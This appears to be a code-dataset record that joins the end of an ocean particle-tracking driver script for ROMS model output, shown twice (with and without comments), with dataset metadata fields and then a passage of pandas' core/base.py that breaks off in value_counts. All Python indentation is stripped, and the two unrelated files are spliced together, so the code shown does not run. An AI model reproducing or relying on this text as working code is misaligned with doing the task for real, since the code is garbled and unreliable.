# number_of_start_days > 1 & days_between_starts, and which hour (UTC) to start on
parser.add_argument('-nsd', '--number_of_start_days', default=1, type=int)
parser.add_argument('-dbs', '--days_between_starts', default=1, type=int)
parser.add_argument('-dtt', '--days_to_track', default=1, type=int)
parser.add_argument('-sh', '--start_hour', default=0, type=int)
# number of divisions to make between saves for the integration
# e.g. if ndiv = 12 and we have hourly saves, we use a 300 sec step
# for the integration. 300 s seems like a good default value,
# based on Banas et al. (2009, CSR RISE paper).
parser.add_argument('-ndiv', default=12, type=int)
parser.add_argument('-sph', default=1, type=int)
# sph = saves per hour, a new argument to allow more frequent writing of output.
args = parser.parse_args()
TR = args.__dict__
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# set where to look for model output
if args.roms_out_num == 0:
TR['roms_out'] = Ldir['roms_out']
elif args.roms_out_num > 0:
TR['roms_out'] = Ldir['roms_out' + str(args.roms_out_num)]
# set dependent and default fields
TR['turb'] = False
# make sure sph is no greater than ndiv
TR['sph'] = np.min((TR['sph'],TR['ndiv']))
# overrides
if TR['3d']:
TR['windage'] = 0
TR['turb'] = True # default is that 3d is always turbulent
if TR['laminar']:
TR['turb'] = False
# get experiment info
TR['gridname'], TR['tag'], TR['ex_name'] = TR['gtagex'].split('_')
# pass some info to Ldir
Ldir['gtagex'] = TR['gtagex']
Ldir['roms_out'] = TR['roms_out']
# get the full path to a valid history file
fn00 = Ldir['roms_out'] / TR['gtagex'] / ('f' + TR['date_string']) / 'ocean_his_0001.nc'
TR['fn00'] = fn00
# set the name of the output folder
out_name = TR['exp_name']
# modify the output folder name, based on other choices
if TR['3d']:
out_name += '_3d'
elif not TR['3d']:
out_name += '_surf'
if TR['laminar']:
out_name += '_laminar'
if TR['windage'] > 0:
out_name += '_wind' + str(int(100*TR['windage']))
if TR['start_hour'] > 0:
out_name += '_sh' + str(int(TR['start_hour']))
if TR['sink'] > 0:
out_name += '_sink' + str(int(TR['sink']))
if TR['no_advection'] == True:
out_name += '_nadv'
if TR['ndiv'] != 12: # only mention ndiv if it is NOT 12
out_name += '_ndiv' + str(TR['ndiv'])
if len(TR['sub_tag']) > 0:
out_name += '_' + TR['sub_tag']
# make the list of start days (datetimes) for separate releases
idt_list = []
dt = datetime.strptime(TR['date_string'], '%Y.%m.%d')
for nic in range(TR['number_of_start_days']):
idt_list.append(dt)
dt = dt + timedelta(TR['days_between_starts'])
# make the output directory (empty)
outdir0 = Ldir['LOo'] / 'tracks'
outdir1 = out_name
outdir = outdir0 / outdir1
if outdir.is_dir():
if args.clobber:
pass # continue and overwrite if clobber is True
else:
print('Warning: output directory exists - rename if you want to keep it!!')
print('-- tracker run not started --')
sys.exit()
Lfun.make_dir(outdir, clean=True)
print(50*'*' + '\nWriting to ' + str(outdir))
sys.stdout.flush()
# Write some info to outdir0 for use by trackfun.py
Lfun.dict_to_csv(TR, outdir0 / 'exp_info.csv')
# and write the same info to outdir as part of the archived run output
Lfun.dict_to_csv(TR, outdir / 'exp_info.csv')
# Load the trackfun module.
# NOTE: we have to load this module AFTER we write [outdir0]/exp_info.csv
# because it uses that information to decide which KDTrees to load. Crude.
if (Ldir['LOu'] / 'tracker' / 'user_trackfun.py').is_file():
sys.path.append(str(Ldir['LOu'] / 'tracker'))
import user_trackfun as tfun
else:
import trackfun as tfun
reload(tfun)
# get the initial particle location vectors
EI = exp.get_exp_info(TR['exp_name'])
plon00, plat00, pcs00 = exp.get_ic(EI, TR['fn00'])
# step through the releases, one for each start day
write_grid = True
for idt0 in idt_list:
tt0 = time() # monitor integration time
# name the release file by start day
idt0_str = datetime.strftime(idt0,'%Y.%m.%d')
outname = ('release_' + idt0_str + '.nc')
print('-- ' + outname)
sys.stdout.flush()
out_fn = outdir / outname
# we do the calculation in one-day segments, but write complete
# output for a release to a single NetCDF file.
for nd in range(TR['days_to_track']):
# get or replace the history file list for this day
idt = idt0 + timedelta(days=nd)
idt_str = datetime.strftime(idt,'%Y.%m.%d')
print(' - working on ' + idt_str)
sys.stdout.flush()
fn_list = tfun.get_fn_list(idt, Ldir)
# write the grid file (once per experiment) for plotting
if write_grid == True:
g_infile = fn_list[0]
g_outfile = outdir / 'grid.nc'
tfnc.write_grid(g_infile, g_outfile)
write_grid = False
# DO THE TRACKING
if nd == 0: # first day
# set IC
plon0 = plon00.copy()
plat0 = plat00.copy()
pcs0 = pcs00.copy()
# do the tracking
if TR['start_hour'] > 0:
fn_list = fn_list[TR['start_hour']:]
P = tfun.get_tracks(fn_list, plon0, plat0, pcs0, TR, trim_loc=True)
# save the results to NetCDF
tfnc.start_outfile(out_fn, P)
else: # subsequent days
# set IC
plon0 = P['lon'][-1,:]
plat0 = P['lat'][-1,:]
pcs0 = P['cs'][-1,:]
# do the tracking
P = tfun.get_tracks(fn_list, plon0, plat0, pcs0, TR)
tfnc.append_to_outfile(out_fn, P)
print(' - Took %0.1f sec for %s day(s)' %
(time() - tt0, str(TR['days_to_track'])))
print(50*'=')
print(50*'*' + '\nWrote to ' + str(outdir))
| 35.465201
| 97
| 0.673001
|
import sys
from datetime import datetime, timedelta
from time import time
import argparse
import numpy as np
from lo_tools import Lfun, zfun
Ldir = Lfun.Lstart()
from importlib import reload
pth = Ldir['LOu'] / 'tracker'
if str(pth) not in sys.path:
sys.path.append(str(pth))
import experiments as exp
reload(exp)
import trackfun_nc as tfnc
reload(tfnc)
parser = argparse.ArgumentParser()
parser.add_argument('-gtx', '--gtagex', default='cas6_v0_live', type=str)
parser.add_argument('-ro', '--roms_out_num', default=2, type=int)
parser.add_argument('-d', '--date_string', default='2021.10.15', type=str)
parser.add_argument('-exp', '--exp_name', default='elb', type=str)
parser.add_argument('-clb', '--clobber', default=False, type=zfun.boolean_string)
parser.add_argument('-sub_tag', default='', type=str)
parser.add_argument('-3d', default=False, type=zfun.boolean_string)
parser.add_argument('-laminar', default=False, type=zfun.boolean_string)
parser.add_argument('-no_advection', default=False, type=zfun.boolean_string)
parser.add_argument('-sink', default=0, type=float)
parser.add_argument('-wnd', '--windage', default=0, type=float)
parser.add_argument('-nsd', '--number_of_start_days', default=1, type=int)
parser.add_argument('-dbs', '--days_between_starts', default=1, type=int)
parser.add_argument('-dtt', '--days_to_track', default=1, type=int)
parser.add_argument('-sh', '--start_hour', default=0, type=int)
parser.add_argument('-ndiv', default=12, type=int)
parser.add_argument('-sph', default=1, type=int)
args = parser.parse_args()
TR = args.__dict__
if args.roms_out_num == 0:
TR['roms_out'] = Ldir['roms_out']
elif args.roms_out_num > 0:
TR['roms_out'] = Ldir['roms_out' + str(args.roms_out_num)]
TR['turb'] = False
TR['sph'] = np.min((TR['sph'],TR['ndiv']))
if TR['3d']:
TR['windage'] = 0
TR['turb'] = True
if TR['laminar']:
TR['turb'] = False
TR['gridname'], TR['tag'], TR['ex_name'] = TR['gtagex'].split('_')
Ldir['gtagex'] = TR['gtagex']
Ldir['roms_out'] = TR['roms_out']
fn00 = Ldir['roms_out'] / TR['gtagex'] / ('f' + TR['date_string']) / 'ocean_his_0001.nc'
TR['fn00'] = fn00
out_name = TR['exp_name']
if TR['3d']:
out_name += '_3d'
elif not TR['3d']:
out_name += '_surf'
if TR['laminar']:
out_name += '_laminar'
if TR['windage'] > 0:
out_name += '_wind' + str(int(100*TR['windage']))
if TR['start_hour'] > 0:
out_name += '_sh' + str(int(TR['start_hour']))
if TR['sink'] > 0:
out_name += '_sink' + str(int(TR['sink']))
if TR['no_advection'] == True:
out_name += '_nadv'
if TR['ndiv'] != 12:
out_name += '_ndiv' + str(TR['ndiv'])
if len(TR['sub_tag']) > 0:
out_name += '_' + TR['sub_tag']
idt_list = []
dt = datetime.strptime(TR['date_string'], '%Y.%m.%d')
for nic in range(TR['number_of_start_days']):
idt_list.append(dt)
dt = dt + timedelta(TR['days_between_starts'])
outdir0 = Ldir['LOo'] / 'tracks'
outdir1 = out_name
outdir = outdir0 / outdir1
if outdir.is_dir():
if args.clobber:
pass
else:
print('Warning: output directory exists - rename if you want to keep it!!')
print('-- tracker run not started --')
sys.exit()
Lfun.make_dir(outdir, clean=True)
print(50*'*' + '\nWriting to ' + str(outdir))
sys.stdout.flush()
Lfun.dict_to_csv(TR, outdir0 / 'exp_info.csv')
Lfun.dict_to_csv(TR, outdir / 'exp_info.csv')
if (Ldir['LOu'] / 'tracker' / 'user_trackfun.py').is_file():
sys.path.append(str(Ldir['LOu'] / 'tracker'))
import user_trackfun as tfun
else:
import trackfun as tfun
reload(tfun)
EI = exp.get_exp_info(TR['exp_name'])
plon00, plat00, pcs00 = exp.get_ic(EI, TR['fn00'])
write_grid = True
for idt0 in idt_list:
tt0 = time()
idt0_str = datetime.strftime(idt0,'%Y.%m.%d')
outname = ('release_' + idt0_str + '.nc')
print('-- ' + outname)
sys.stdout.flush()
out_fn = outdir / outname
for nd in range(TR['days_to_track']):
idt = idt0 + timedelta(days=nd)
idt_str = datetime.strftime(idt,'%Y.%m.%d')
print(' - working on ' + idt_str)
sys.stdout.flush()
fn_list = tfun.get_fn_list(idt, Ldir)
if write_grid == True:
g_infile = fn_list[0]
g_outfile = outdir / 'grid.nc'
tfnc.write_grid(g_infile, g_outfile)
write_grid = False
if nd == 0:
plon0 = plon00.copy()
plat0 = plat00.copy()
pcs0 = pcs00.copy()
if TR['start_hour'] > 0:
fn_list = fn_list[TR['start_hour']:]
P = tfun.get_tracks(fn_list, plon0, plat0, pcs0, TR, trim_loc=True)
tfnc.start_outfile(out_fn, P)
else:
plon0 = P['lon'][-1,:]
plat0 = P['lat'][-1,:]
pcs0 = P['cs'][-1,:]
P = tfun.get_tracks(fn_list, plon0, plat0, pcs0, TR)
tfnc.append_to_outfile(out_fn, P)
print(' - Took %0.1f sec for %s day(s)' %
(time() - tt0, str(TR['days_to_track'])))
print(50*'=')
print(50*'*' + '\nWrote to ' + str(outdir))
| true
| true
|
790daa7e42b3981224910e6c988de58eb9912933
| 38,591
|
py
|
Python
|
pandas/core/base.py
|
BryanRacic/pandas
|
21c299194a2b59a715fa7264bd6b44787deafc7a
|
[
"BSD-3-Clause"
] | null | null | null |
pandas/core/base.py
|
BryanRacic/pandas
|
21c299194a2b59a715fa7264bd6b44787deafc7a
|
[
"BSD-3-Clause"
] | null | null | null |
pandas/core/base.py
|
BryanRacic/pandas
|
21c299194a2b59a715fa7264bd6b44787deafc7a
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Base and utility classes for pandas objects.
"""
from __future__ import annotations
import textwrap
from typing import (
TYPE_CHECKING,
Any,
Generic,
Hashable,
Literal,
TypeVar,
cast,
final,
)
import numpy as np
import pandas._libs.lib as lib
from pandas._typing import (
ArrayLike,
DtypeObj,
FrameOrSeries,
IndexLabel,
Shape,
npt,
)
from pandas.compat import PYPY
from pandas.compat.numpy import function as nv
from pandas.errors import AbstractMethodError
from pandas.util._decorators import (
cache_readonly,
doc,
)
from pandas.core.dtypes.common import (
is_categorical_dtype,
is_dict_like,
is_extension_array_dtype,
is_object_dtype,
is_scalar,
)
from pandas.core.dtypes.generic import (
ABCDataFrame,
ABCIndex,
ABCSeries,
)
from pandas.core.dtypes.missing import (
isna,
remove_na_arraylike,
)
from pandas.core import (
algorithms,
ops,
)
from pandas.core.accessor import DirNamesMixin
from pandas.core.algorithms import (
duplicated,
unique1d,
value_counts,
)
from pandas.core.arraylike import OpsMixin
from pandas.core.arrays import ExtensionArray
from pandas.core.construction import (
create_series_with_explicit_dtype,
ensure_wrapped_if_datetimelike,
extract_array,
)
import pandas.core.nanops as nanops
if TYPE_CHECKING:
from pandas._typing import (
NumpySorter,
NumpyValueArrayLike,
)
from pandas import Categorical
_shared_docs: dict[str, str] = {}
_indexops_doc_kwargs = {
"klass": "IndexOpsMixin",
"inplace": "",
"unique": "IndexOpsMixin",
"duplicated": "IndexOpsMixin",
}
_T = TypeVar("_T", bound="IndexOpsMixin")
class PandasObject(DirNamesMixin):
"""
Baseclass for various pandas objects.
"""
# results from calls to methods decorated with cache_readonly get added to _cache
_cache: dict[str, Any]
@property
def _constructor(self):
"""
Class constructor (for this class it's just `__class__`.
"""
return type(self)
def __repr__(self) -> str:
"""
Return a string representation for a particular object.
"""
# Should be overwritten by base classes
return object.__repr__(self)
def _reset_cache(self, key: str | None = None) -> None:
"""
Reset cached properties. If ``key`` is passed, only clears that key.
"""
if not hasattr(self, "_cache"):
return
if key is None:
self._cache.clear()
else:
self._cache.pop(key, None)
def __sizeof__(self) -> int:
"""
Generates the total memory usage for an object that returns
either a value or Series of values
"""
memory_usage = getattr(self, "memory_usage", None)
if memory_usage:
mem = memory_usage(deep=True)
return int(mem if is_scalar(mem) else mem.sum())
# no memory_usage attribute, so fall back to object's 'sizeof'
return super().__sizeof__()
class NoNewAttributesMixin:
"""
Mixin which prevents adding new attributes.
Prevents additional attributes via xxx.attribute = "something" after a
call to `self.__freeze()`. Mainly used to prevent the user from using
wrong attributes on an accessor (`Series.cat/.str/.dt`).
If you really want to add a new attribute at a later time, you need to use
`object.__setattr__(self, key, value)`.
"""
def _freeze(self):
"""
Prevents setting additional attributes.
"""
object.__setattr__(self, "__frozen", True)
# prevent adding any attribute via s.xxx.new_attribute = ...
def __setattr__(self, key: str, value):
# _cache is used by a decorator
# We need to check both 1.) cls.__dict__ and 2.) getattr(self, key)
# because
# 1.) getattr is false for attributes that raise errors
# 2.) cls.__dict__ doesn't traverse into base classes
if getattr(self, "__frozen", False) and not (
key == "_cache"
or key in type(self).__dict__
or getattr(self, key, None) is not None
):
raise AttributeError(f"You cannot add any new attribute '{key}'")
object.__setattr__(self, key, value)
class DataError(Exception):
pass
class SpecificationError(Exception):
pass
class SelectionMixin(Generic[FrameOrSeries]):
"""
mixin implementing the selection & aggregation interface on a group-like
object sub-classes need to define: obj, exclusions
"""
obj: FrameOrSeries
_selection: IndexLabel | None = None
exclusions: frozenset[Hashable]
_internal_names = ["_cache", "__setstate__"]
_internal_names_set = set(_internal_names)
@final
@property
def _selection_list(self):
if not isinstance(
self._selection, (list, tuple, ABCSeries, ABCIndex, np.ndarray)
):
return [self._selection]
return self._selection
@cache_readonly
def _selected_obj(self):
if self._selection is None or isinstance(self.obj, ABCSeries):
return self.obj
else:
return self.obj[self._selection]
@final
@cache_readonly
def ndim(self) -> int:
return self._selected_obj.ndim
@final
@cache_readonly
def _obj_with_exclusions(self):
if self._selection is not None and isinstance(self.obj, ABCDataFrame):
return self.obj[self._selection_list]
if len(self.exclusions) > 0:
# equivalent to `self.obj.drop(self.exclusions, axis=1)
# but this avoids consolidating and making a copy
return self.obj._drop_axis(
self.exclusions, axis=1, consolidate=False, only_slice=True
)
else:
return self.obj
def __getitem__(self, key):
if self._selection is not None:
raise IndexError(f"Column(s) {self._selection} already selected")
if isinstance(key, (list, tuple, ABCSeries, ABCIndex, np.ndarray)):
if len(self.obj.columns.intersection(key)) != len(key):
bad_keys = list(set(key).difference(self.obj.columns))
raise KeyError(f"Columns not found: {str(bad_keys)[1:-1]}")
return self._gotitem(list(key), ndim=2)
elif not getattr(self, "as_index", False):
if key not in self.obj.columns:
raise KeyError(f"Column not found: {key}")
return self._gotitem(key, ndim=2)
else:
if key not in self.obj:
raise KeyError(f"Column not found: {key}")
subset = self.obj[key]
ndim = subset.ndim
return self._gotitem(key, ndim=ndim, subset=subset)
def _gotitem(self, key, ndim: int, subset=None):
"""
sub-classes to define
return a sliced object
Parameters
----------
key : str / list of selections
ndim : {1, 2}
requested ndim of result
subset : object, default None
subset to act on
"""
raise AbstractMethodError(self)
def aggregate(self, func, *args, **kwargs):
raise AbstractMethodError(self)
agg = aggregate
class IndexOpsMixin(OpsMixin):
"""
Common ops mixin to support a unified interface / docs for Series / Index
"""
# ndarray compatibility
__array_priority__ = 1000
_hidden_attrs: frozenset[str] = frozenset(
["tolist"] # tolist is not deprecated, just suppressed in the __dir__
)
@property
def dtype(self) -> DtypeObj:
# must be defined here as a property for mypy
raise AbstractMethodError(self)
@property
def _values(self) -> ExtensionArray | np.ndarray:
# must be defined here as a property for mypy
raise AbstractMethodError(self)
def transpose(self: _T, *args, **kwargs) -> _T:
"""
Return the transpose, which is by definition self.
Returns
-------
%(klass)s
"""
nv.validate_transpose(args, kwargs)
return self
T = property(
transpose,
doc="""
Return the transpose, which is by definition self.
""",
)
@property
def shape(self) -> Shape:
"""
Return a tuple of the shape of the underlying data.
"""
return self._values.shape
def __len__(self) -> int:
# We need this defined here for mypy
raise AbstractMethodError(self)
@property
def ndim(self) -> int:
"""
Number of dimensions of the underlying data, by definition 1.
"""
return 1
def item(self):
"""
Return the first element of the underlying data as a Python scalar.
Returns
-------
scalar
The first element of %(klass)s.
Raises
------
ValueError
If the data is not length-1.
"""
if len(self) == 1:
return next(iter(self))
raise ValueError("can only convert an array of size 1 to a Python scalar")
@property
def nbytes(self) -> int:
"""
Return the number of bytes in the underlying data.
"""
return self._values.nbytes
@property
def size(self) -> int:
"""
Return the number of elements in the underlying data.
"""
return len(self._values)
@property
def array(self) -> ExtensionArray:
"""
The ExtensionArray of the data backing this Series or Index.
Returns
-------
ExtensionArray
An ExtensionArray of the values stored within. For extension
types, this is the actual array. For NumPy native types, this
is a thin (no copy) wrapper around :class:`numpy.ndarray`.
``.array`` differs ``.values`` which may require converting the
data to a different form.
See Also
--------
Index.to_numpy : Similar method that always returns a NumPy array.
Series.to_numpy : Similar method that always returns a NumPy array.
Notes
-----
This table lays out the different array types for each extension
dtype within pandas.
================== =============================
dtype array type
================== =============================
category Categorical
period PeriodArray
interval IntervalArray
IntegerNA IntegerArray
string StringArray
boolean BooleanArray
datetime64[ns, tz] DatetimeArray
================== =============================
For any 3rd-party extension types, the array type will be an
ExtensionArray.
For all remaining dtypes ``.array`` will be a
:class:`arrays.NumpyExtensionArray` wrapping the actual ndarray
stored within. If you absolutely need a NumPy array (possibly with
copying / coercing data), then use :meth:`Series.to_numpy` instead.
Examples
--------
For regular NumPy types like int, and float, a PandasArray
is returned.
>>> pd.Series([1, 2, 3]).array
<PandasArray>
[1, 2, 3]
Length: 3, dtype: int64
For extension types, like Categorical, the actual ExtensionArray
is returned
>>> ser = pd.Series(pd.Categorical(['a', 'b', 'a']))
>>> ser.array
['a', 'b', 'a']
Categories (2, object): ['a', 'b']
"""
raise AbstractMethodError(self)
def to_numpy(
self,
dtype: npt.DTypeLike | None = None,
copy: bool = False,
na_value=lib.no_default,
**kwargs,
) -> np.ndarray:
"""
A NumPy ndarray representing the values in this Series or Index.
Parameters
----------
dtype : str or numpy.dtype, optional
The dtype to pass to :meth:`numpy.asarray`.
copy : bool, default False
Whether to ensure that the returned value is not a view on
another array. Note that ``copy=False`` does not *ensure* that
``to_numpy()`` is no-copy. Rather, ``copy=True`` ensure that
a copy is made, even if not strictly necessary.
na_value : Any, optional
The value to use for missing values. The default value depends
on `dtype` and the type of the array.
.. versionadded:: 1.0.0
**kwargs
Additional keywords passed through to the ``to_numpy`` method
of the underlying array (for extension arrays).
.. versionadded:: 1.0.0
Returns
-------
numpy.ndarray
See Also
--------
Series.array : Get the actual data stored within.
Index.array : Get the actual data stored within.
DataFrame.to_numpy : Similar method for DataFrame.
Notes
-----
The returned array will be the same up to equality (values equal
in `self` will be equal in the returned array; likewise for values
that are not equal). When `self` contains an ExtensionArray, the
dtype may be different. For example, for a category-dtype Series,
``to_numpy()`` will return a NumPy array and the categorical dtype
will be lost.
For NumPy dtypes, this will be a reference to the actual data stored
in this Series or Index (assuming ``copy=False``). Modifying the result
in place will modify the data stored in the Series or Index (not that
we recommend doing that).
For extension types, ``to_numpy()`` *may* require copying data and
coercing the result to a NumPy type (possibly object), which may be
expensive. When you need a no-copy reference to the underlying data,
:attr:`Series.array` should be used instead.
This table lays out the different dtypes and default return types of
``to_numpy()`` for various dtypes within pandas.
================== ================================
dtype array type
================== ================================
category[T] ndarray[T] (same dtype as input)
period ndarray[object] (Periods)
interval ndarray[object] (Intervals)
IntegerNA ndarray[object]
datetime64[ns] datetime64[ns]
datetime64[ns, tz] ndarray[object] (Timestamps)
================== ================================
Examples
--------
>>> ser = pd.Series(pd.Categorical(['a', 'b', 'a']))
>>> ser.to_numpy()
array(['a', 'b', 'a'], dtype=object)
Specify the `dtype` to control how datetime-aware data is represented.
Use ``dtype=object`` to return an ndarray of pandas :class:`Timestamp`
objects, each with the correct ``tz``.
>>> ser = pd.Series(pd.date_range('2000', periods=2, tz="CET"))
>>> ser.to_numpy(dtype=object)
array([Timestamp('2000-01-01 00:00:00+0100', tz='CET'),
Timestamp('2000-01-02 00:00:00+0100', tz='CET')],
dtype=object)
Or ``dtype='datetime64[ns]'`` to return an ndarray of native
datetime64 values. The values are converted to UTC and the timezone
info is dropped.
>>> ser.to_numpy(dtype="datetime64[ns]")
... # doctest: +ELLIPSIS
array(['1999-12-31T23:00:00.000000000', '2000-01-01T23:00:00...'],
dtype='datetime64[ns]')
"""
if is_extension_array_dtype(self.dtype):
# error: Too many arguments for "to_numpy" of "ExtensionArray"
return self.array.to_numpy( # type: ignore[call-arg]
dtype, copy=copy, na_value=na_value, **kwargs
)
elif kwargs:
bad_keys = list(kwargs.keys())[0]
raise TypeError(
f"to_numpy() got an unexpected keyword argument '{bad_keys}'"
)
result = np.asarray(self._values, dtype=dtype)
# TODO(GH-24345): Avoid potential double copy
if copy or na_value is not lib.no_default:
result = result.copy()
if na_value is not lib.no_default:
result[self.isna()] = na_value
return result
@property
def empty(self) -> bool:
return not self.size
def max(self, axis=None, skipna: bool = True, *args, **kwargs):
"""
Return the maximum value of the Index.
Parameters
----------
axis : int, optional
For compatibility with NumPy. Only 0 or None are allowed.
skipna : bool, default True
Exclude NA/null values when showing the result.
*args, **kwargs
Additional arguments and keywords for compatibility with NumPy.
Returns
-------
scalar
Maximum value.
See Also
--------
Index.min : Return the minimum value in an Index.
Series.max : Return the maximum value in a Series.
DataFrame.max : Return the maximum values in a DataFrame.
Examples
--------
>>> idx = pd.Index([3, 2, 1])
>>> idx.max()
3
>>> idx = pd.Index(['c', 'b', 'a'])
>>> idx.max()
'c'
For a MultiIndex, the maximum is determined lexicographically.
>>> idx = pd.MultiIndex.from_product([('a', 'b'), (2, 1)])
>>> idx.max()
('b', 2)
"""
nv.validate_minmax_axis(axis)
nv.validate_max(args, kwargs)
return nanops.nanmax(self._values, skipna=skipna)
@doc(op="max", oppose="min", value="largest")
def argmax(self, axis=None, skipna: bool = True, *args, **kwargs) -> int:
"""
Return int position of the {value} value in the Series.
If the {op}imum is achieved in multiple locations,
the first row position is returned.
Parameters
----------
axis : {{None}}
Dummy argument for consistency with Series.
skipna : bool, default True
Exclude NA/null values when showing the result.
*args, **kwargs
Additional arguments and keywords for compatibility with NumPy.
Returns
-------
int
Row position of the {op}imum value.
See Also
--------
Series.arg{op} : Return position of the {op}imum value.
Series.arg{oppose} : Return position of the {oppose}imum value.
numpy.ndarray.arg{op} : Equivalent method for numpy arrays.
Series.idxmax : Return index label of the maximum values.
Series.idxmin : Return index label of the minimum values.
Examples
--------
Consider dataset containing cereal calories
>>> s = pd.Series({{'Corn Flakes': 100.0, 'Almond Delight': 110.0,
... 'Cinnamon Toast Crunch': 120.0, 'Cocoa Puff': 110.0}})
>>> s
Corn Flakes 100.0
Almond Delight 110.0
Cinnamon Toast Crunch 120.0
Cocoa Puff 110.0
dtype: float64
>>> s.argmax()
2
>>> s.argmin()
0
The maximum cereal calories is the third element and
the minimum cereal calories is the first element,
since series is zero-indexed.
"""
delegate = self._values
nv.validate_minmax_axis(axis)
skipna = nv.validate_argmax_with_skipna(skipna, args, kwargs)
if isinstance(delegate, ExtensionArray):
if not skipna and delegate.isna().any():
return -1
else:
return delegate.argmax()
else:
# error: Incompatible return value type (got "Union[int, ndarray]", expected
# "int")
return nanops.nanargmax( # type: ignore[return-value]
delegate, skipna=skipna
)
def min(self, axis=None, skipna: bool = True, *args, **kwargs):
"""
Return the minimum value of the Index.
Parameters
----------
axis : {None}
Dummy argument for consistency with Series.
skipna : bool, default True
Exclude NA/null values when showing the result.
*args, **kwargs
Additional arguments and keywords for compatibility with NumPy.
Returns
-------
scalar
Minimum value.
See Also
--------
Index.max : Return the maximum value of the object.
Series.min : Return the minimum value in a Series.
DataFrame.min : Return the minimum values in a DataFrame.
Examples
--------
>>> idx = pd.Index([3, 2, 1])
>>> idx.min()
1
>>> idx = pd.Index(['c', 'b', 'a'])
>>> idx.min()
'a'
For a MultiIndex, the minimum is determined lexicographically.
>>> idx = pd.MultiIndex.from_product([('a', 'b'), (2, 1)])
>>> idx.min()
('a', 1)
"""
nv.validate_minmax_axis(axis)
nv.validate_min(args, kwargs)
return nanops.nanmin(self._values, skipna=skipna)
@doc(argmax, op="min", oppose="max", value="smallest")
def argmin(self, axis=None, skipna=True, *args, **kwargs) -> int:
delegate = self._values
nv.validate_minmax_axis(axis)
skipna = nv.validate_argmin_with_skipna(skipna, args, kwargs)
if isinstance(delegate, ExtensionArray):
if not skipna and delegate.isna().any():
return -1
else:
return delegate.argmin()
else:
# error: Incompatible return value type (got "Union[int, ndarray]", expected
# "int")
return nanops.nanargmin( # type: ignore[return-value]
delegate, skipna=skipna
)
def tolist(self):
"""
Return a list of the values.
These are each a scalar type, which is a Python scalar
(for str, int, float) or a pandas scalar
(for Timestamp/Timedelta/Interval/Period)
Returns
-------
list
See Also
--------
numpy.ndarray.tolist : Return the array as an a.ndim-levels deep
nested list of Python scalars.
"""
if not isinstance(self._values, np.ndarray):
# check for ndarray instead of dtype to catch DTA/TDA
return list(self._values)
return self._values.tolist()
to_list = tolist
def __iter__(self):
"""
Return an iterator of the values.
These are each a scalar type, which is a Python scalar
(for str, int, float) or a pandas scalar
(for Timestamp/Timedelta/Interval/Period)
Returns
-------
iterator
"""
# We are explicitly making element iterators.
if not isinstance(self._values, np.ndarray):
# Check type instead of dtype to catch DTA/TDA
return iter(self._values)
else:
return map(self._values.item, range(self._values.size))
@cache_readonly
def hasnans(self) -> bool:
"""
Return if I have any nans; enables various perf speedups.
"""
return bool(isna(self).any())
def isna(self):
return isna(self._values)
def _reduce(
self,
op,
name: str,
*,
axis=0,
skipna=True,
numeric_only=None,
filter_type=None,
**kwds,
):
"""
Perform the reduction type operation if we can.
"""
func = getattr(self, name, None)
if func is None:
raise TypeError(
f"{type(self).__name__} cannot perform the operation {name}"
)
return func(skipna=skipna, **kwds)
@final
def _map_values(self, mapper, na_action=None):
"""
An internal function that maps values using the input
correspondence (which can be a dict, Series, or function).
Parameters
----------
mapper : function, dict, or Series
The input correspondence object
na_action : {None, 'ignore'}
If 'ignore', propagate NA values, without passing them to the
mapping function
Returns
-------
Union[Index, MultiIndex], inferred
The output of the mapping function applied to the index.
If the function returns a tuple with more than one element
a MultiIndex will be returned.
"""
# we can fastpath dict/Series to an efficient map
# as we know that we are not going to have to yield
# python types
if is_dict_like(mapper):
if isinstance(mapper, dict) and hasattr(mapper, "__missing__"):
# If a dictionary subclass defines a default value method,
# convert mapper to a lookup function (GH #15999).
dict_with_default = mapper
mapper = lambda x: dict_with_default[x]
else:
# Dictionary does not have a default. Thus it's safe to
# convert to an Series for efficiency.
# we specify the keys here to handle the
# possibility that they are tuples
# The return value of mapping with an empty mapper is
# expected to be pd.Series(np.nan, ...). As np.nan is
# of dtype float64 the return value of this method should
# be float64 as well
mapper = create_series_with_explicit_dtype(
mapper, dtype_if_empty=np.float64
)
if isinstance(mapper, ABCSeries):
# Since values were input this means we came from either
# a dict or a series and mapper should be an index
if is_categorical_dtype(self.dtype):
# use the built in categorical series mapper which saves
# time by mapping the categories instead of all values
cat = cast("Categorical", self._values)
return cat.map(mapper)
values = self._values
indexer = mapper.index.get_indexer(values)
new_values = algorithms.take_nd(mapper._values, indexer)
return new_values
# we must convert to python types
if is_extension_array_dtype(self.dtype) and hasattr(self._values, "map"):
# GH#23179 some EAs do not have `map`
values = self._values
if na_action is not None:
raise NotImplementedError
map_f = lambda values, f: values.map(f)
else:
values = self._values.astype(object)
if na_action == "ignore":
map_f = lambda values, f: lib.map_infer_mask(
values, f, isna(values).view(np.uint8)
)
elif na_action is None:
map_f = lib.map_infer
else:
msg = (
"na_action must either be 'ignore' or None, "
f"{na_action} was passed"
)
raise ValueError(msg)
# mapper is a function
new_values = map_f(values, mapper)
return new_values
def value_counts(
self,
normalize: bool = False,
sort: bool = True,
ascending: bool = False,
bins=None,
dropna: bool = True,
):
"""
Return a Series containing counts of unique values.
The resulting object will be in descending order so that the
first element is the most frequently-occurring element.
Excludes NA values by default.
Parameters
----------
normalize : bool, default False
If True then the object returned will contain the relative
frequencies of the unique values.
sort : bool, default True
Sort by frequencies.
ascending : bool, default False
Sort in ascending order.
bins : int, optional
Rather than count values, group them into half-open bins,
a convenience for ``pd.cut``, only works with numeric data.
dropna : bool, default True
Don't include counts of NaN.
Returns
-------
Series
See Also
--------
Series.count: Number of non-NA elements in a Series.
DataFrame.count: Number of non-NA elements in a DataFrame.
DataFrame.value_counts: Equivalent method on DataFrames.
Examples
--------
>>> index = pd.Index([3, 1, 2, 3, 4, np.nan])
>>> index.value_counts()
3.0 2
1.0 1
2.0 1
4.0 1
dtype: int64
With `normalize` set to `True`, returns the relative frequency by
dividing all values by the sum of values.
>>> s = pd.Series([3, 1, 2, 3, 4, np.nan])
>>> s.value_counts(normalize=True)
3.0 0.4
1.0 0.2
2.0 0.2
4.0 0.2
dtype: float64
**bins**
Bins can be useful for going from a continuous variable to a
categorical variable; instead of counting unique
apparitions of values, divide the index in the specified
number of half-open bins.
>>> s.value_counts(bins=3)
(0.996, 2.0] 2
(2.0, 3.0] 2
(3.0, 4.0] 1
dtype: int64
**dropna**
With `dropna` set to `False` we can also see NaN index values.
>>> s.value_counts(dropna=False)
3.0 2
1.0 1
2.0 1
4.0 1
NaN 1
dtype: int64
"""
return value_counts(
